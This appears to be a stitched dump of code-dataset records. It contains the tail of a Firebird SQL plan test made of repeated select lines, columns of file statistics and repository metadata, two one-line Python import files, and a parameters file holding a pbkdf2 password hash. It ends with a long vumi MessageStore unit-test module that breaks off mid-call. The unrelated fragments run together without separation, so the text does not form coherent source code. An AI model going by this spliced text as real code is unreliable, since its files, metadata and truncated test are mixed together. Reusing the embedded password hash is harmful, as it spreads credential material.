select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
/* select 1 from rdb$relations into :x; */
suspend;
end ^
set term ;^
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """set plan on;
select * from big_plan ;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """PLAN (BIG_PLAN NATURAL)
X
============
1
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_expected_stdout == act_1.clean_stdout
| 31.733766
| 370
| 0.707592
| 879
| 4,887
| 3.889647
| 0.13083
| 0.194501
| 0.305645
| 0.389003
| 0.746417
| 0.746417
| 0.746417
| 0.746417
| 0.746417
| 0.746417
| 0
| 0.037313
| 0.204829
| 4,887
| 153
| 371
| 31.941176
| 0.842512
| 0.119296
| 0
| 0.795082
| 0
| 0
| 0.888164
| 0
| 0
| 0
| 0
| 0
| 0.008197
| 1
| 0.008197
| false
| 0
| 0.016393
| 0
| 0.02459
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
46101db436af02330538445ce962914693fb56c9
| 98
|
py
|
Python
|
app/blueprints/jobs/__init__.py
|
Anioko/TestApp
|
95fa8d27ca8e7a074e62f92609427a378844e621
|
[
"MIT"
] | null | null | null |
app/blueprints/jobs/__init__.py
|
Anioko/TestApp
|
95fa8d27ca8e7a074e62f92609427a378844e621
|
[
"MIT"
] | 1
|
2021-06-02T01:53:47.000Z
|
2021-06-02T01:53:47.000Z
|
app/blueprints/jobs/__init__.py
|
Anioko/TestApp
|
95fa8d27ca8e7a074e62f92609427a378844e621
|
[
"MIT"
] | null | null | null |
from app.blueprints.jobs import errors # noqa
from app.blueprints.jobs.views import jobs # noqa
| 32.666667
| 50
| 0.785714
| 15
| 98
| 5.133333
| 0.533333
| 0.181818
| 0.441558
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 98
| 2
| 51
| 49
| 0.916667
| 0.091837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
46182e6d440f7bf10de7f2c8e48fc383a8e6e5a5
| 85
|
py
|
Python
|
lib/loss/__init__.py
|
REI-ZERO-Y/waifu2x-chainer
|
27ece822d24e8ed76a632c2cf0ff9e6b8e6b2abb
|
[
"MIT"
] | 150
|
2017-01-05T17:22:32.000Z
|
2022-02-26T22:05:30.000Z
|
lib/loss/__init__.py
|
REI-ZERO-Y/waifu2x-chainer
|
27ece822d24e8ed76a632c2cf0ff9e6b8e6b2abb
|
[
"MIT"
] | 33
|
2017-09-18T05:38:26.000Z
|
2022-03-28T09:45:54.000Z
|
lib/loss/__init__.py
|
REI-ZERO-Y/waifu2x-chainer
|
27ece822d24e8ed76a632c2cf0ff9e6b8e6b2abb
|
[
"MIT"
] | 46
|
2017-07-27T09:24:06.000Z
|
2021-12-04T07:47:32.000Z
|
from lib.loss.clipped_weighted_huber_loss import clipped_weighted_huber_loss # NOQA
| 42.5
| 84
| 0.882353
| 13
| 85
| 5.307692
| 0.615385
| 0.434783
| 0.57971
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082353
| 85
| 1
| 85
| 85
| 0.884615
| 0.047059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1cc815e8db981e42050608568de5cb42cd4e5d56
| 92
|
py
|
Python
|
parameters_8000.py
|
hadarrah/Shots_Manager
|
79b187d03d60ecefa8406e19b37ac45e76ea89ec
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
hadarrah/Shots_Manager
|
79b187d03d60ecefa8406e19b37ac45e76ea89ec
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
hadarrah/Shots_Manager
|
79b187d03d60ecefa8406e19b37ac45e76ea89ec
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$836d496047184fe4$49914946f0d1681dd5c1866909d35895cdaf1085"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.582418
| 0.01087
| 92
| 1
| 92
| 92
| 0.318681
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1c001541aac8150cff0aa147dd55dab29535f35d
| 81,214
|
py
|
Python
|
vumi/components/tests/test_message_store.py
|
seidu626/vumi
|
62eae205a07029bc7ab382086715694548001876
|
[
"BSD-3-Clause"
] | 199
|
2015-01-05T09:04:24.000Z
|
2018-08-15T17:02:49.000Z
|
vumi/components/tests/test_message_store.py
|
seidu626/vumi
|
62eae205a07029bc7ab382086715694548001876
|
[
"BSD-3-Clause"
] | 187
|
2015-01-06T15:22:38.000Z
|
2018-07-14T13:15:29.000Z
|
vumi/components/tests/test_message_store.py
|
seidu626/vumi
|
62eae205a07029bc7ab382086715694548001876
|
[
"BSD-3-Clause"
] | 86
|
2015-01-31T02:47:08.000Z
|
2018-12-01T11:59:47.000Z
|
# -*- coding: utf-8 -*-
"""Tests for vumi.components.message_store."""
import time
from datetime import datetime, timedelta
from twisted.internet.defer import inlineCallbacks, returnValue
from vumi.message import TransportEvent, format_vumi_date
from vumi.tests.helpers import (
VumiTestCase, MessageHelper, PersistenceHelper, import_skip)
try:
from vumi.components.message_store import (
MessageStore, to_reverse_timestamp, from_reverse_timestamp,
add_batches_to_event)
except ImportError, e:
import_skip(e, 'riak')
def zero_ms(timestamp):
dt, dot, ms = format_vumi_date(timestamp).partition(".")
return dot.join([dt, "0" * len(ms)])
class TestReverseTimestampUtils(VumiTestCase):
def test_to_reverse_timestamp(self):
"""
to_reverse_timestamp() turns a vumi_date-formatted string into a
reverse timestamp.
"""
self.assertEqual(
"FFAAE41F25", to_reverse_timestamp("2015-04-01 12:13:14"))
self.assertEqual(
"FFAAE41F25", to_reverse_timestamp("2015-04-01 12:13:14.000000"))
self.assertEqual(
"FFAAE41F25", to_reverse_timestamp("2015-04-01 12:13:14.999999"))
self.assertEqual(
"FFAAE41F24", to_reverse_timestamp("2015-04-01 12:13:15"))
self.assertEqual(
"F0F9025FA5", to_reverse_timestamp("4015-04-01 12:13:14"))
def test_from_reverse_timestamp(self):
"""
from_reverse_timestamp() is the inverse of to_reverse_timestamp().
"""
self.assertEqual(
"2015-04-01 12:13:14.000000", from_reverse_timestamp("FFAAE41F25"))
self.assertEqual(
"2015-04-01 12:13:13.000000", from_reverse_timestamp("FFAAE41F26"))
self.assertEqual(
"4015-04-01 12:13:14.000000", from_reverse_timestamp("F0F9025FA5"))
class TestMessageStoreBase(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.persistence_helper = self.add_helper(
PersistenceHelper(use_riak=True))
self.redis = yield self.persistence_helper.get_redis_manager()
self.manager = self.persistence_helper.get_riak_manager()
self.add_cleanup(self.manager.close_manager)
self.store = MessageStore(self.manager, self.redis)
self.msg_helper = self.add_helper(MessageHelper())
@inlineCallbacks
def _maybe_batch(self, tag, by_batch):
add_kw, batch_id = {}, None
if tag is not None:
batch_id = yield self.store.batch_start([tag])
if by_batch:
add_kw['batch_id'] = batch_id
else:
add_kw['tag'] = tag
returnValue((add_kw, batch_id))
@inlineCallbacks
def _create_outbound(self, tag=("pool", "tag"), by_batch=False,
content='outbound foo'):
"""Create and store an outbound message."""
add_kw, batch_id = yield self._maybe_batch(tag, by_batch)
msg = self.msg_helper.make_outbound(content)
msg_id = msg['message_id']
yield self.store.add_outbound_message(msg, **add_kw)
returnValue((msg_id, msg, batch_id))
@inlineCallbacks
def _create_inbound(self, tag=("pool", "tag"), by_batch=False,
content='inbound foo'):
"""Create and store an inbound message."""
add_kw, batch_id = yield self._maybe_batch(tag, by_batch)
msg = self.msg_helper.make_inbound(
content, to_addr="+1234567810001", transport_type="sms")
msg_id = msg['message_id']
yield self.store.add_inbound_message(msg, **add_kw)
returnValue((msg_id, msg, batch_id))
@inlineCallbacks
def create_outbound_messages(self, batch_id, count, start_timestamp=None,
time_multiplier=10, to_addr=None):
# Store via message_store
now = start_timestamp or datetime.now()
messages = []
for i in range(count):
msg = self.msg_helper.make_outbound(
"foo", timestamp=(now - timedelta(i * time_multiplier)))
if to_addr is not None:
msg['to_addr'] = to_addr
yield self.store.add_outbound_message(msg, batch_id=batch_id)
messages.append(msg)
returnValue(messages)
def _create_event(self, event_type, timestamp):
maker = {
'ack': self.msg_helper.make_ack,
'nack': self.msg_helper.make_nack,
'delivery_report': self.msg_helper.make_delivery_report,
}[event_type]
return maker(timestamp=timestamp)
@inlineCallbacks
def create_events(self, batch_id, count, start_timestamp=None,
time_multiplier=10, event_mix=None):
# Store via message_store
now = start_timestamp or datetime.now()
events = []
if event_mix is None:
event_mix = ['ack', 'nack', 'delivery_report']
event_types = (event_mix * count)[:count]
for i, event_type in enumerate(event_types):
ev = self._create_event(
event_type, timestamp=(now - timedelta(i * time_multiplier)))
yield self.store.add_event(ev, batch_ids=[batch_id])
events.append(ev)
returnValue(events)
@inlineCallbacks
def create_inbound_messages(self, batch_id, count, start_timestamp=None,
time_multiplier=10, from_addr=None):
# Store via message_store
now = start_timestamp or datetime.now()
messages = []
for i in range(count):
msg = self.msg_helper.make_inbound(
"foo", timestamp=(now - timedelta(i * time_multiplier)))
if from_addr is not None:
msg['from_addr'] = from_addr
yield self.store.add_inbound_message(msg, batch_id=batch_id)
messages.append(msg)
returnValue(messages)
def _batch_status(self, ack=0, nack=0, delivered=0, failed=0, pending=0,
sent=0):
return {
'ack': ack, 'nack': nack, 'sent': sent,
'delivery_report': sum([delivered, failed, pending]),
'delivery_report.delivered': delivered,
'delivery_report.failed': failed,
'delivery_report.pending': pending,
}
class TestMessageStore(TestMessageStoreBase):
@inlineCallbacks
def test_batch_start(self):
tag1 = ("poolA", "tag1")
batch_id = yield self.store.batch_start([tag1])
batch = yield self.store.get_batch(batch_id)
tag_info = yield self.store.get_tag_info(tag1)
outbound_keys = yield self.store.batch_outbound_keys(batch_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(outbound_keys, [])
self.assertEqual(list(batch.tags), [tag1])
self.assertEqual(tag_info.current_batch.key, batch_id)
self.assertEqual(batch_status, self._batch_status())
@inlineCallbacks
def test_batch_start_with_metadata(self):
batch_id = yield self.store.batch_start([], key1=u"foo", key2=u"bar")
batch = yield self.store.get_batch(batch_id)
self.assertEqual(batch.metadata['key1'], "foo")
self.assertEqual(batch.metadata['key2'], "bar")
@inlineCallbacks
def test_batch_done(self):
tag1 = ("poolA", "tag1")
batch_id = yield self.store.batch_start([tag1])
yield self.store.batch_done(batch_id)
batch = yield self.store.get_batch(batch_id)
tag_info = yield self.store.get_tag_info(tag1)
self.assertEqual(list(batch.tags), [tag1])
self.assertEqual(tag_info.current_batch.key, None)
@inlineCallbacks
def test_add_outbound_message(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
stored_msg = yield self.store.get_outbound_message(msg_id)
self.assertEqual(stored_msg, msg)
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(event_keys, [])
@inlineCallbacks
def test_add_outbound_message_again(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
old_stored_msg = yield self.store.get_outbound_message(msg_id)
self.assertEqual(old_stored_msg, msg)
msg['helper_metadata']['foo'] = {'bar': 'baz'}
yield self.store.add_outbound_message(msg)
new_stored_msg = yield self.store.get_outbound_message(msg_id)
self.assertEqual(new_stored_msg, msg)
self.assertNotEqual(old_stored_msg, new_stored_msg)
@inlineCallbacks
def test_add_outbound_message_with_batch_id(self):
msg_id, msg, batch_id = yield self._create_outbound(by_batch=True)
stored_msg = yield self.store.get_outbound_message(msg_id)
outbound_keys = yield self.store.batch_outbound_keys(batch_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys, [msg_id])
self.assertEqual(event_keys, [])
self.assertEqual(batch_status, self._batch_status(sent=1))
@inlineCallbacks
def test_add_outbound_message_with_tag(self):
msg_id, msg, batch_id = yield self._create_outbound()
stored_msg = yield self.store.get_outbound_message(msg_id)
outbound_keys = yield self.store.batch_outbound_keys(batch_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys, [msg_id])
self.assertEqual(event_keys, [])
self.assertEqual(batch_status, self._batch_status(sent=1))
@inlineCallbacks
def test_add_outbound_message_to_multiple_batches(self):
msg_id, msg, batch_id_1 = yield self._create_outbound()
batch_id_2 = yield self.store.batch_start()
yield self.store.add_outbound_message(msg, batch_id=batch_id_2)
self.assertEqual(
(yield self.store.batch_outbound_keys(batch_id_1)), [msg_id])
self.assertEqual(
(yield self.store.batch_outbound_keys(batch_id_2)), [msg_id])
# Make sure we're writing the right indexes.
stored_msg = yield self.store.outbound_messages.load(msg_id)
timestamp = format_vumi_date(msg['timestamp'])
reverse_ts = to_reverse_timestamp(timestamp)
self.assertEqual(stored_msg._riak_object.get_indexes(), set([
('batches_bin', batch_id_1),
('batches_bin', batch_id_2),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_1, timestamp, msg['to_addr'])),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_2, timestamp, msg['to_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_1, reverse_ts, msg['to_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_2, reverse_ts, msg['to_addr'])),
]))
@inlineCallbacks
def test_get_events_for_message(self):
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
dr = self.msg_helper.make_delivery_report(msg)
dr_id = ack['event_id']
yield self.store.add_event(dr)
stored_ack = yield self.store.get_event(ack_id)
stored_dr = yield self.store.get_event(dr_id)
events = yield self.store.get_events_for_message(msg_id)
self.assertTrue(len(events), 2)
self.assertTrue(
all(isinstance(event, TransportEvent) for event in events))
self.assertTrue(stored_ack in events)
self.assertTrue(stored_dr in events)
@inlineCallbacks
def test_add_ack_event_batch_ids_from_outbound(self):
"""
If the `batch_ids` param is not given, and the event doesn't exist,
batch ids are looked up on the outbound message.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1, ack=1))
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [batch_id])
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set([
"%s$%s$ack" % (batch_id, to_reverse_timestamp(timestamp)),
]))
@inlineCallbacks
def test_add_ack_event_uses_existing_batches(self):
"""
If the `batch_ids` param is not given, and the event already
exists, batch ids should not be looked up on the outbound message.
"""
# create a message but don't store it
msg = self.msg_helper.make_outbound('outbound text')
msg_id = msg['message_id']
batch_id = yield self.store.batch_start([('pool', 'tag')])
# create an event and store it
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, [batch_id])
# now store the event again without specifying batches
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=0, ack=1))
event = yield self.store.events.load(ack_id)
self.assertEqual(event.batches.keys(), [batch_id])
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set([
"%s$%s$ack" % (batch_id, to_reverse_timestamp(timestamp)),
]))
@inlineCallbacks
def test_add_ack_event_with_batch_ids(self):
"""
If an event is added with batch_ids provided, those batch_ids are used.
"""
msg_id, msg, batch_id = yield self._create_outbound()
batch_1 = yield self.store.batch_start([])
batch_2 = yield self.store.batch_start([])
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[batch_1, batch_2])
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
batch_1_status = yield self.store.batch_status(batch_1)
batch_2_status = yield self.store.batch_status(batch_2)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1))
self.assertEqual(batch_1_status, self._batch_status(ack=1))
self.assertEqual(batch_2_status, self._batch_status(ack=1))
event = yield self.store.events.load(ack_id)
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set([
"%s$%s$ack" % (batch_1, to_reverse_timestamp(timestamp)),
"%s$%s$ack" % (batch_2, to_reverse_timestamp(timestamp)),
]))
@inlineCallbacks
def test_add_ack_event_without_batch_ids_no_outbound(self):
"""
If an event is added without batch_ids and no outbound message is
found, no batch_ids will be used.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
ack['user_message_id'] = "no-message"
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys("no-message")
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1))
event = yield self.store.events.load(ack_id)
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
"no-message", timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set())
@inlineCallbacks
def test_add_ack_event_with_empty_batch_ids(self):
"""
If an event is added with an empty list of batch_ids, no batch_ids will
be used.
"""
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack, batch_ids=[])
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1))
event = yield self.store.events.load(ack_id)
timestamp = format_vumi_date(ack["timestamp"])
self.assertEqual(event.message_with_status, "%s$%s$ack" % (
msg_id, timestamp))
self.assertEqual(set(event.batches_with_statuses_reverse), set())
@inlineCallbacks
def test_add_ack_event_again(self):
msg_id, msg, batch_id = yield self._create_outbound()
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
old_stored_ack = yield self.store.get_event(ack_id)
self.assertEqual(old_stored_ack, ack)
ack['helper_metadata']['foo'] = {'bar': 'baz'}
yield self.store.add_event(ack)
new_stored_ack = yield self.store.get_event(ack_id)
self.assertEqual(new_stored_ack, ack)
self.assertNotEqual(old_stored_ack, new_stored_ack)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(event_keys, [ack_id])
self.assertEqual(batch_status, self._batch_status(sent=1, ack=1))
@inlineCallbacks
def test_add_nack_event(self):
msg_id, msg, batch_id = yield self._create_outbound()
nack = self.msg_helper.make_nack(msg)
nack_id = nack['event_id']
yield self.store.add_event(nack)
stored_nack = yield self.store.get_event(nack_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_nack, nack)
self.assertEqual(event_keys, [nack_id])
self.assertEqual(batch_status, self._batch_status(sent=1, nack=1))
event = yield self.store.events.load(nack_id)
self.assertEqual(event.message_with_status, "%s$%s$nack" % (
msg_id, nack["timestamp"]))
@inlineCallbacks
def test_add_ack_event_without_batch(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
ack = self.msg_helper.make_ack(msg)
ack_id = ack['event_id']
yield self.store.add_event(ack)
stored_ack = yield self.store.get_event(ack_id)
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(stored_ack, ack)
self.assertEqual(event_keys, [ack_id])
@inlineCallbacks
def test_add_nack_event_without_batch(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
nack = self.msg_helper.make_nack(msg)
nack_id = nack['event_id']
yield self.store.add_event(nack)
stored_nack = yield self.store.get_event(nack_id)
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(stored_nack, nack)
self.assertEqual(event_keys, [nack_id])
@inlineCallbacks
def test_add_delivery_report_events(self):
msg_id, msg, batch_id = yield self._create_outbound()
dr_ids = []
for status in TransportEvent.DELIVERY_STATUSES:
dr = self.msg_helper.make_delivery_report(
msg, delivery_status=status)
dr_id = dr['event_id']
dr_ids.append(dr_id)
yield self.store.add_event(dr)
stored_dr = yield self.store.get_event(dr_id)
self.assertEqual(stored_dr, dr)
event = yield self.store.events.load(dr_id)
self.assertEqual(event.message_with_status, "%s$%s$%s" % (
msg_id, dr["timestamp"], "delivery_report.%s" % (status,)))
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(sorted(event_keys), sorted(dr_ids))
dr_counts = dict((status, 1)
for status in TransportEvent.DELIVERY_STATUSES)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(batch_status, self._batch_status(sent=1, **dr_counts))
@inlineCallbacks
def test_add_inbound_message(self):
msg_id, msg, _batch_id = yield self._create_inbound(tag=None)
stored_msg = yield self.store.get_inbound_message(msg_id)
self.assertEqual(stored_msg, msg)
@inlineCallbacks
def test_add_inbound_message_again(self):
msg_id, msg, _batch_id = yield self._create_inbound(tag=None)
old_stored_msg = yield self.store.get_inbound_message(msg_id)
self.assertEqual(old_stored_msg, msg)
msg['helper_metadata']['foo'] = {'bar': 'baz'}
yield self.store.add_inbound_message(msg)
new_stored_msg = yield self.store.get_inbound_message(msg_id)
self.assertEqual(new_stored_msg, msg)
self.assertNotEqual(old_stored_msg, new_stored_msg)
@inlineCallbacks
def test_add_inbound_message_with_batch_id(self):
msg_id, msg, batch_id = yield self._create_inbound(by_batch=True)
stored_msg = yield self.store.get_inbound_message(msg_id)
inbound_keys = yield self.store.batch_inbound_keys(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys, [msg_id])
@inlineCallbacks
def test_add_inbound_message_with_tag(self):
msg_id, msg, batch_id = yield self._create_inbound()
stored_msg = yield self.store.get_inbound_message(msg_id)
inbound_keys = yield self.store.batch_inbound_keys(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(inbound_keys, [msg_id])
@inlineCallbacks
def test_add_inbound_message_to_multiple_batches(self):
msg_id, msg, batch_id_1 = yield self._create_inbound()
batch_id_2 = yield self.store.batch_start()
yield self.store.add_inbound_message(msg, batch_id=batch_id_2)
self.assertEqual((yield self.store.batch_inbound_keys(batch_id_1)),
[msg_id])
self.assertEqual((yield self.store.batch_inbound_keys(batch_id_2)),
[msg_id])
# Make sure we're writing the right indexes.
stored_msg = yield self.store.inbound_messages.load(msg_id)
timestamp = format_vumi_date(msg['timestamp'])
reverse_ts = to_reverse_timestamp(timestamp)
self.assertEqual(stored_msg._riak_object.get_indexes(), set([
('batches_bin', batch_id_1),
('batches_bin', batch_id_2),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_1, timestamp, msg['from_addr'])),
('batches_with_addresses_bin',
"%s$%s$%s" % (batch_id_2, timestamp, msg['from_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_1, reverse_ts, msg['from_addr'])),
('batches_with_addresses_reverse_bin',
"%s$%s$%s" % (batch_id_2, reverse_ts, msg['from_addr'])),
]))
@inlineCallbacks
def test_inbound_counts(self):
_msg_id, _msg, batch_id = yield self._create_inbound(by_batch=True)
self.assertEqual(1, (yield self.store.batch_inbound_count(batch_id)))
yield self.store.add_inbound_message(
self.msg_helper.make_inbound("foo"), batch_id=batch_id)
self.assertEqual(2, (yield self.store.batch_inbound_count(batch_id)))
@inlineCallbacks
def test_outbound_counts(self):
_msg_id, _msg, batch_id = yield self._create_outbound(by_batch=True)
self.assertEqual(1, (yield self.store.batch_outbound_count(batch_id)))
yield self.store.add_outbound_message(
self.msg_helper.make_outbound("foo"), batch_id=batch_id)
self.assertEqual(2, (yield self.store.batch_outbound_count(batch_id)))
@inlineCallbacks
def test_inbound_keys_matching(self):
msg_id, msg, batch_id = yield self._create_inbound(content='hello')
self.assertEqual(
[msg_id],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'hell.+',
'flags': 'i',
}])))
# test case sensitivity
self.assertEqual(
[],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.content',
'pattern': 'HELLO',
'flags': '',
}])))
# the inbound from_addr has a leading +, it needs to be escaped
self.assertEqual(
[msg_id],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
'key': 'msg.from_addr',
'pattern': "\%s" % (msg.payload['from_addr'],),
'flags': 'i',
}])))
# the outbound to_addr has a leading +, it needs to be escaped
self.assertEqual(
[msg_id],
(yield self.store.batch_inbound_keys_matching(batch_id, query=[{
